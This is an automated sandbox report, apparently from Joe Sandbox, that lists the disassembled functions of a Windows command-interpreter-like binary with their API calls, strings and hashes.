Part of subcall function 00007FF683F72618: GetConsoleScreenBufferInfo.API-MS-WIN-CORE-CONSOLE-L2-1-0(?,?,?,?,?,?,00008000,00007FF683F72397), ref: 00007FF683F72666

Memory Dump Source

Source File: 00000005.00000002.1653401363.00007FF683F71000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF683F70000, based on PE: true

Associated: 00000005.00000002.1653377393.00007FF683F70000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1653434339.00007FF683FA2000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1653454376.00007FF683FAD000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1653454376.00007FF683FB1000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1653454376.00007FF683FBF000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1653454376.00007FF683FC4000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1653554365.00007FF683FC9000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ff683f70000_alpha.jbxd

Similarity

API ID: memset$BufferConsoleInfoScreen
String ID:
API String ID: 1034426908-0
Opcode ID: 99e430a40e837be57a61fbba6b08e33b3e626514a3936da40c6adeee05acd63b
Instruction ID: af219a01b049c0b21d22226ba96ef1a4bf0f54baa5f1cc7ccf4eb5e207939020
Opcode Fuzzy Hash: 99e430a40e837be57a61fbba6b08e33b3e626514a3936da40c6adeee05acd63b
Instruction Fuzzy Hash: 12F1AD32A087C2DAEB64CF21D8526E967B0FF45788F484139DA4EAB695DF3CE544C780

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF683F9AA30 Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 123registryCOMMON

Download Yara Rule

APIs

RegCreateKeyExW.API-MS-WIN-CORE-REGISTRY-L1-1-0 ref: 00007FF683F9AA85
RegSetValueExW.API-MS-WIN-CORE-REGISTRY-L1-1-0 ref: 00007FF683F9AACF
RegCloseKey.API-MS-WIN-CORE-REGISTRY-L1-1-0 ref: 00007FF683F9AAEC
RegDeleteKeyExW.API-MS-WIN-CORE-REGISTRY-L1-1-0(?,?,?,?,?,?,?,?,?,?,00000000,00000000,?,00007FF683F998C0), ref: 00007FF683F9AB39
RegOpenKeyExW.API-MS-WIN-CORE-REGISTRY-L1-1-0(?,?,?,?,?,?,?,?,?,?,00000000,00000000,?,00007FF683F998C0), ref: 00007FF683F9AB6F
RegDeleteValueW.API-MS-WIN-CORE-REGISTRY-L1-1-0(?,?,?,?,?,?,?,?,?,?,00000000,00000000,?,00007FF683F998C0), ref: 00007FF683F9ABA4
RegCloseKey.API-MS-WIN-CORE-REGISTRY-L1-1-0(?,?,?,?,?,?,?,?,?,?,00000000,00000000,?,00007FF683F998C0), ref: 00007FF683F9ABCB

Strings

%s=%s, xrefs: 00007FF683F9AB02

Memory Dump Source

Source File: 00000005.00000002.1653401363.00007FF683F71000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF683F70000, based on PE: true

Associated: 00000005.00000002.1653377393.00007FF683F70000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1653434339.00007FF683FA2000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1653454376.00007FF683FAD000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1653454376.00007FF683FB1000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1653454376.00007FF683FBF000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1653454376.00007FF683FC4000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1653554365.00007FF683FC9000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ff683f70000_alpha.jbxd

Similarity

API ID: CloseDeleteValue$CreateOpen
String ID: %s=%s
API String ID: 1019019434-1087296587
Opcode ID: 72247b027dceff1e1530fc5cf8e528a5709370e20d618e6d58b54cd87f2ef8dd
Instruction ID: 38f9e2dfd8ca892379cf5fc3a526ecec95c8c8ebc9d953db16cc868a48889363
Opcode Fuzzy Hash: 72247b027dceff1e1530fc5cf8e528a5709370e20d618e6d58b54cd87f2ef8dd
Instruction Fuzzy Hash: E051A331B08B92C6EB608F25A44677A7AA5FF89790F488239CE5DE3794DF38D445CB40

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF683F74A30 Relevance: 10.8, APIs: 7, Instructions: 318COMMON

Download Yara Rule

APIs

memset.MSVCRT ref: 00007FF683F74A87

Part of subcall function 00007FF683F7CA40: memset.MSVCRT ref: 00007FF683F7CAB3

wcsrchr.MSVCRT ref: 00007FF683F74B19
GetFullPathNameW.API-MS-WIN-CORE-FILE-L1-1-0 ref: 00007FF683F74B83
??_V@YAXPEAX@Z.MSVCRT ref: 00007FF683F74BDD

Memory Dump Source

Source File: 00000005.00000002.1653401363.00007FF683F71000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF683F70000, based on PE: true

Associated: 00000005.00000002.1653377393.00007FF683F70000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1653434339.00007FF683FA2000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1653454376.00007FF683FAD000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1653454376.00007FF683FB1000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1653454376.00007FF683FBF000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1653454376.00007FF683FC4000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1653554365.00007FF683FC9000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ff683f70000_alpha.jbxd

Similarity

API ID: memset$FullNamePathwcsrchr
String ID:
API String ID: 4289998964-0
Opcode ID: ca4f6fec6d1e45853bca55d284d940f9823b5f813051b5de8d9b268dc279a2c6
Instruction ID: 5238864a448595cc60df1737a31b13d570f87c71f8152bf6ffd1f7e2dc7305b4
Opcode Fuzzy Hash: ca4f6fec6d1e45853bca55d284d940f9823b5f813051b5de8d9b268dc279a2c6
Instruction Fuzzy Hash: 15C1B411B0939AD2EE949F56D54A779A3A0FF45B90F085539CE0EA7BD0DF3CA491C380

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF683F73D94 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 110nativeCOMMON

Download Yara Rule

APIs

_setjmp.MSVCRT ref: 00007FF683F73DD4

Part of subcall function 00007FF683F8417C: GetCurrentDirectoryW.API-MS-WIN-CORE-PROCESSENVIRONMENT-L1-1-0 ref: 00007FF683F841AD

Part of subcall function 00007FF683F71884: wcsrchr.MSVCRT ref: 00007FF683F7194E
Part of subcall function 00007FF683F71884: _wcsnicmp.MSVCRT ref: 00007FF683F719A1

NtQueryInformationProcess.NTDLL ref: 00007FF683F73E9C
NtSetInformationProcess.NTDLL ref: 00007FF683F73EC9
NtSetInformationProcess.NTDLL ref: 00007FF683F73F4D

Strings

%9d, xrefs: 00007FF683F73EF9

Memory Dump Source

Source File: 00000005.00000002.1653401363.00007FF683F71000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF683F70000, based on PE: true

Associated: 00000005.00000002.1653377393.00007FF683F70000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1653434339.00007FF683FA2000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1653454376.00007FF683FAD000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1653454376.00007FF683FB1000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1653454376.00007FF683FBF000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1653454376.00007FF683FC4000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1653554365.00007FF683FC9000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ff683f70000_alpha.jbxd

Similarity

API ID: InformationProcess$CurrentDirectoryQuery_setjmp_wcsnicmpwcsrchr
String ID: %9d
API String ID: 1006866328-2241623522
Opcode ID: 62d65c6c863574456e8a18a26f120651995e0feaf5acd41ec6a68f480e3dc1f6
Instruction ID: 30b483812017c69ca558d9e1bccfa9d90f2c5f7d8c90ace072b302e2e51f6584
Opcode Fuzzy Hash: 62d65c6c863574456e8a18a26f120651995e0feaf5acd41ec6a68f480e3dc1f6
Instruction Fuzzy Hash: 9F516DB2A08652DAE700CF21E8425A97BB4FF44758F484639DA2DB77A5CF3CE545CB80

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF683F78DF8 Relevance: 7.8, APIs: 5, Instructions: 281COMMON

Download Yara Rule

APIs

memset.MSVCRT ref: 00007FF683F78E6D
memset.MSVCRT ref: 00007FF683F78E93

Part of subcall function 00007FF683F7CA40: memset.MSVCRT ref: 00007FF683F7CAB3

??_V@YAXPEAX@Z.MSVCRT ref: 00007FF683F78F9A
??_V@YAXPEAX@Z.MSVCRT ref: 00007FF683F78FBC

Memory Dump Source

Source File: 00000005.00000002.1653401363.00007FF683F71000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF683F70000, based on PE: true

Associated: 00000005.00000002.1653377393.00007FF683F70000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1653434339.00007FF683FA2000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1653454376.00007FF683FAD000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1653454376.00007FF683FB1000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1653454376.00007FF683FBF000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1653454376.00007FF683FC4000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1653554365.00007FF683FC9000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ff683f70000_alpha.jbxd

Similarity

API ID: memset
String ID:
API String ID: 2221118986-0
Opcode ID: 4ec132db5a5163512eeab285e6cca4fd0bb6ff7b6cd64baaaa3bea2245e3dd05
Instruction ID: 202834b27d10a591d8e7e0058ac6f9a5ce5daf33c6fe3a5e6a3867e9b5b4acca
Opcode Fuzzy Hash: 4ec132db5a5163512eeab285e6cca4fd0bb6ff7b6cd64baaaa3bea2245e3dd05
Instruction Fuzzy Hash: D0C1E422A097C2C6EB64DB21E852AF963B5FF95788F084139DA1D977A0DF3CE551C380

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF683F7D250 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 187COMMON

Download Yara Rule

APIs

_wcsicmp.MSVCRT ref: 00007FF683F7D292

Strings

GeToken: (%x) '%s', xrefs: 00007FF683F8D0C8

Memory Dump Source

Source File: 00000005.00000002.1653401363.00007FF683F71000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF683F70000, based on PE: true

Associated: 00000005.00000002.1653377393.00007FF683F70000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1653434339.00007FF683FA2000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1653454376.00007FF683FAD000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1653454376.00007FF683FB1000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1653454376.00007FF683FBF000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1653454376.00007FF683FC4000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1653554365.00007FF683FC9000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ff683f70000_alpha.jbxd

Similarity

API ID: _wcsicmp
String ID: GeToken: (%x) '%s'
API String ID: 2081463915-1994581435
Opcode ID: fe18cb0ed8500a4f68af4489c4d2b16fbbaa9a87b1c7dbde9da4f66a5e2be525
Instruction ID: a061021b3a4051615c37df8637e387ba8f5f1e3f911e95f7752ec7d093b057c3
Opcode Fuzzy Hash: fe18cb0ed8500a4f68af4489c4d2b16fbbaa9a87b1c7dbde9da4f66a5e2be525
Instruction Fuzzy Hash: 03719D20E0C692C6FBA5AB25A84627526B0BF20754F5C453EE55EF76E0DF7CA482C7C0

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF683F802A0 Relevance: 35.3, APIs: 13, Strings: 7, Instructions: 279COMMON

Download Yara Rule

APIs

_wcsicmp.MSVCRT ref: 00007FF683F802C2
_wcsicmp.MSVCRT ref: 00007FF683F802E4
_wcsicmp.MSVCRT ref: 00007FF683F80306
_wcsicmp.MSVCRT ref: 00007FF683F80328
_wcsicmp.MSVCRT ref: 00007FF683F8034A
_wcsicmp.MSVCRT ref: 00007FF683F80368
_wcsicmp.MSVCRT ref: 00007FF683F86CF2
_wcsicmp.MSVCRT ref: 00007FF683F86D61
_wcsicmp.MSVCRT ref: 00007FF683F86D7F
_wcsicmp.MSVCRT ref: 00007FF683F86D9D
_wcsicmp.MSVCRT ref: 00007FF683F86DBB
iswspace.MSVCRT ref: 00007FF683F86E01
wcschr.MSVCRT ref: 00007FF683F86E2C

Strings

REM, xrefs: 00007FF683F80343
IF/?, xrefs: 00007FF683F80321
;, xrefs: 00007FF683F803FD
FOR, xrefs: 00007FF683F802BB
FOR/?, xrefs: 00007FF683F802DD, 00007FF683F86CE9
=,;, xrefs: 00007FF683F86E1C
REM/?, xrefs: 00007FF683F80361

Memory Dump Source

Source File: 00000005.00000002.1653401363.00007FF683F71000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF683F70000, based on PE: true

Associated: 00000005.00000002.1653377393.00007FF683F70000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1653434339.00007FF683FA2000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1653454376.00007FF683FAD000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1653454376.00007FF683FB1000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1653454376.00007FF683FBF000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1653454376.00007FF683FC4000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1653554365.00007FF683FC9000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ff683f70000_alpha.jbxd

Similarity

API ID: _wcsicmp$iswspacewcschr
String ID: ;$=,;$FOR$FOR/?$IF/?$REM$REM/?
API String ID: 840959033-3627297882
Opcode ID: a685c2dfbfb933869e1ee9a5fd26f57dd0ea790cc444f73fb6d6a268455a5bb9
Instruction ID: 538f25ce431c11675a09306b61b172360e259773bd378baf1f802cd99e033535
Opcode Fuzzy Hash: a685c2dfbfb933869e1ee9a5fd26f57dd0ea790cc444f73fb6d6a268455a5bb9
Instruction Fuzzy Hash: CAD14921E48643C6FB199F22A8472B966A4FF44B48F8C403DDA5EF72A5DF2CE405C790

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF683FA1A40 Relevance: 22.9, APIs: 10, Strings: 3, Instructions: 148COMMON

Download Yara Rule

APIs

memset.MSVCRT ref: 00007FF683FA1AA6
memset.MSVCRT ref: 00007FF683FA1ACC

Part of subcall function 00007FF683F7CA40: memset.MSVCRT ref: 00007FF683F7CAB3

GetVolumePathNameW.API-MS-WIN-CORE-FILE-L1-1-0 ref: 00007FF683FA1B3E
GetDriveTypeW.API-MS-WIN-CORE-FILE-L1-1-0 ref: 00007FF683FA1B67
GetVolumeInformationW.API-MS-WIN-CORE-FILE-L1-1-0 ref: 00007FF683FA1BD7
_wcsicmp.MSVCRT ref: 00007FF683FA1C05
_wcsicmp.MSVCRT ref: 00007FF683FA1C34
_wcsicmp.MSVCRT ref: 00007FF683FA1C63
??_V@YAXPEAX@Z.MSVCRT ref: 00007FF683FA1C89
??_V@YAXPEAX@Z.MSVCRT ref: 00007FF683FA1CA9

Strings

CSVFS, xrefs: 00007FF683FA1C58
REFS, xrefs: 00007FF683FA1C29
NTFS, xrefs: 00007FF683FA1BFA

Memory Dump Source

Source File: 00000005.00000002.1653401363.00007FF683F71000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF683F70000, based on PE: true

Associated: 00000005.00000002.1653377393.00007FF683F70000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1653434339.00007FF683FA2000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1653454376.00007FF683FAD000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1653454376.00007FF683FB1000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1653454376.00007FF683FBF000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1653454376.00007FF683FC4000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1653554365.00007FF683FC9000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ff683f70000_alpha.jbxd

Similarity

API ID: _wcsicmpmemset$Volume$DriveInformationNamePathType
String ID: CSVFS$NTFS$REFS
API String ID: 3510147486-2605508654
Opcode ID: 16da7e415156957614f2e65e2147701ecc6f9267ccedce46241fe4d5de2b202f
Instruction ID: b60a6032791027867ebc67dfb4c5921f5cc3da710fc0ffad876e69d12330fcc7
Opcode Fuzzy Hash: 16da7e415156957614f2e65e2147701ecc6f9267ccedce46241fe4d5de2b202f
Instruction Fuzzy Hash: EC613932608BC2CAEB658F21D8463E977A4FF45B89F494039DA0DAB758DF78D208C740

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF683F7B998 Relevance: 21.3, APIs: 8, Strings: 4, Instructions: 275COMMON

Download Yara Rule

APIs

Part of subcall function 00007FF683F7CD90: GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,?,00007FF683F7B9A1,?,?,?,?,00007FF683F7D81A), ref: 00007FF683F7CDA6
Part of subcall function 00007FF683F7CD90: RtlAllocateHeap.NTDLL(?,?,?,00007FF683F7B9A1,?,?,?,?,00007FF683F7D81A), ref: 00007FF683F7CDBD

memset.MSVCRT ref: 00007FF683F7BA2B
wcschr.MSVCRT ref: 00007FF683F7BA8A
wcschr.MSVCRT ref: 00007FF683F7BAAA

Strings

=,;+/[] ", xrefs: 00007FF683F7BA83
=,;, xrefs: 00007FF683F7BC9C
:.\, xrefs: 00007FF683F7BAA3
-, xrefs: 00007FF683F8C3EA

Memory Dump Source

Source File: 00000005.00000002.1653401363.00007FF683F71000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF683F70000, based on PE: true

Associated: 00000005.00000002.1653377393.00007FF683F70000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1653434339.00007FF683FA2000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1653454376.00007FF683FAD000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1653454376.00007FF683FB1000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1653454376.00007FF683FBF000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1653454376.00007FF683FC4000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1653554365.00007FF683FC9000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ff683f70000_alpha.jbxd

Similarity

API ID: Heapwcschr$AllocateProcessmemset
String ID: -$:.\$=,;$=,;+/[] "
API String ID: 2060774286-969133440
Opcode ID: 7b3217b0480b3f12f234bd17b6b4b81bb5ac0aea220cc5327607834eba670ac4
Instruction ID: 82b96d0a470e99da23437de0a2c112eec7c1f250e1f3691b1833acd0ba7b0d75
Opcode Fuzzy Hash: 7b3217b0480b3f12f234bd17b6b4b81bb5ac0aea220cc5327607834eba670ac4
Instruction Fuzzy Hash: E8B1A421A0E682C1FA649B15948A27967B0FF4AB84F4D4239DE5EE77D4DF3CE841C380

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF683F8662C Relevance: 19.4, APIs: 9, Strings: 2, Instructions: 170COMMON

Download Yara Rule

APIs

wcschr.MSVCRT ref: 00007FF683F86677
iswdigit.MSVCRT ref: 00007FF683F8668F
_errno.MSVCRT ref: 00007FF683F866A3
wcstol.MSVCRT ref: 00007FF683F866C4
iswdigit.MSVCRT ref: 00007FF683F866E4
iswalpha.MSVCRT ref: 00007FF683F866FE

Strings

+-~!, xrefs: 00007FF683F86670
APerformUnaryOperation: '%c', xrefs: 00007FF683F8F78E

Memory Dump Source

Source File: 00000005.00000002.1653401363.00007FF683F71000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF683F70000, based on PE: true

Associated: 00000005.00000002.1653377393.00007FF683F70000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1653434339.00007FF683FA2000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1653454376.00007FF683FAD000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1653454376.00007FF683FB1000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1653454376.00007FF683FBF000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1653454376.00007FF683FC4000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1653554365.00007FF683FC9000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ff683f70000_alpha.jbxd

Similarity

API ID: iswdigit$_errnoiswalphawcschrwcstol
String ID: +-~!$APerformUnaryOperation: '%c'
API String ID: 2348642995-441775793
Opcode ID: 3043d5b8b3736d8e68c05dd1a897401147fff5d71c47df5c8b899d9aaf2ce369
Instruction ID: 250388e4f5bbae883bac570317bfbbe3c22baf96d42bca5b23e67358151652af
Opcode Fuzzy Hash: 3043d5b8b3736d8e68c05dd1a897401147fff5d71c47df5c8b899d9aaf2ce369
Instruction Fuzzy Hash: 09715D62948B46C5E7685F22D41217D77A0FF49B84B58C03ADB5EA7394EF3CA484C790

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF683F9627C Relevance: 15.8, APIs: 8, Strings: 1, Instructions: 95synchronizationCOMMON

Download Yara Rule

APIs

WaitForSingleObject.API-MS-WIN-CORE-SYNCH-L1-1-0(?,?,00000000,00007FF683F97251), ref: 00007FF683F9628E

Strings

wil, xrefs: 00007FF683F963D2

Memory Dump Source

Source File: 00000005.00000002.1653401363.00007FF683F71000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF683F70000, based on PE: true

Associated: 00000005.00000002.1653377393.00007FF683F70000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1653434339.00007FF683FA2000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1653454376.00007FF683FAD000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1653454376.00007FF683FB1000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1653454376.00007FF683FBF000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1653454376.00007FF683FC4000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1653554365.00007FF683FC9000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ff683f70000_alpha.jbxd

Similarity

API ID: ObjectSingleWait
String ID: wil
API String ID: 24740636-1589926490
Opcode ID: ea3b1f99615cb6da41309659edc9fe07f1318ac417b21432a0effa90e1671882
Instruction ID: 0639a084ce4e665c258bf3791d0f4e3de9e7fb1433e84a83f40fef1596213334
Opcode Fuzzy Hash: ea3b1f99615cb6da41309659edc9fe07f1318ac417b21432a0effa90e1671882
Instruction Fuzzy Hash: 81414D21A0C642C3F7604F15E44267976A2FF8A7A5F688139ED49E7BD4CF3DE844C681

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF683F9CDC0 Relevance: 15.8, APIs: 6, Strings: 3, Instructions: 94windowCOMMON

Download Yara Rule

APIs

FormatMessageW.API-MS-WIN-CORE-LOCALIZATION-L1-2-0 ref: 00007FF683F9CE20
_ultoa.MSVCRT ref: 00007FF683F9CE43
GetACP.API-MS-WIN-CORE-LOCALIZATION-L1-2-0 ref: 00007FF683F9CE4F
MultiByteToWideChar.API-MS-WIN-CORE-STRING-L1-1-0 ref: 00007FF683F9CE84
FormatMessageW.API-MS-WIN-CORE-LOCALIZATION-L1-2-0 ref: 00007FF683F9CEDE
LocalFree.API-MS-WIN-CORE-HEAP-L2-1-0 ref: 00007FF683F9CF24

Strings

System, xrefs: 00007FF683F9CE90
Application, xrefs: 00007FF683F9CEAB
, xrefs: 00007FF683F9CE64

Memory Dump Source

Source File: 00000005.00000002.1653401363.00007FF683F71000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF683F70000, based on PE: true

Associated: 00000005.00000002.1653377393.00007FF683F70000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1653434339.00007FF683FA2000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1653454376.00007FF683FAD000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1653454376.00007FF683FB1000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1653454376.00007FF683FBF000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1653454376.00007FF683FC4000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1653554365.00007FF683FC9000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ff683f70000_alpha.jbxd

Similarity

API ID: FormatMessage$ByteCharFreeLocalMultiWide_ultoa
String ID: $Application$System
API String ID: 3377411628-1881496484
Opcode ID: 80d38d575318b3867918aa38a6e3db8ef172391286b4c5249a392e05da5dfb20
Instruction ID: a365ab05c0bbc452c8c65530c34277a49b9b97cf10190283a1ce5896f4758fae
Opcode Fuzzy Hash: 80d38d575318b3867918aa38a6e3db8ef172391286b4c5249a392e05da5dfb20
Instruction Fuzzy Hash: A5410832B18A42DAEB109F61E4413ED77A5FB89748F48513ADA4EA3B98DF3CD145C780

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF683F77AA0 Relevance: 15.2, APIs: 10, Instructions: 221COMMON

Download Yara Rule

APIs

memset.MSVCRT ref: 00007FF683F77B13
GetFullPathNameW.API-MS-WIN-CORE-FILE-L1-1-0 ref: 00007FF683F77B5F
CreateDirectoryW.API-MS-WIN-CORE-FILE-L1-1-0 ref: 00007FF683F77B83
??_V@YAXPEAX@Z.MSVCRT ref: 00007FF683F77BA9

Part of subcall function 00007FF683F8291C: GetDriveTypeW.KERNELBASE ref: 00007FF683F8294A

Memory Dump Source

Source File: 00000005.00000002.1653401363.00007FF683F71000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF683F70000, based on PE: true

Associated: 00000005.00000002.1653377393.00007FF683F70000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1653434339.00007FF683FA2000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1653454376.00007FF683FAD000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1653454376.00007FF683FB1000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1653454376.00007FF683FBF000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1653454376.00007FF683FC4000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1653554365.00007FF683FC9000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ff683f70000_alpha.jbxd

Similarity

API ID: CreateDirectoryDriveFullNamePathTypememset
String ID:
API String ID: 1397130798-0
Opcode ID: 1e06caf0b77d17d600aef2fcb22a4425febc896dd4a75ac9af5e73f825b2a127
Instruction ID: cca324c5e3792fea237cd6d39f08a038b69a48f037269ceab5603eea2db6cd19
Opcode Fuzzy Hash: 1e06caf0b77d17d600aef2fcb22a4425febc896dd4a75ac9af5e73f825b2a127
Instruction Fuzzy Hash: 7C91C522B19B82C6EF699B1298426B973B1FF48B84F4C8139DA4DA7794DF3CD544C380

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF683F8258C Relevance: 15.1, APIs: 5, Strings: 5, Instructions: 85COMMON

Download Yara Rule

APIs

Part of subcall function 00007FF683F806C0: GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,00000000,00007FF683F7B4DB), ref: 00007FF683F806D6
Part of subcall function 00007FF683F806C0: HeapAlloc.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,00000000,00007FF683F7B4DB), ref: 00007FF683F806F0
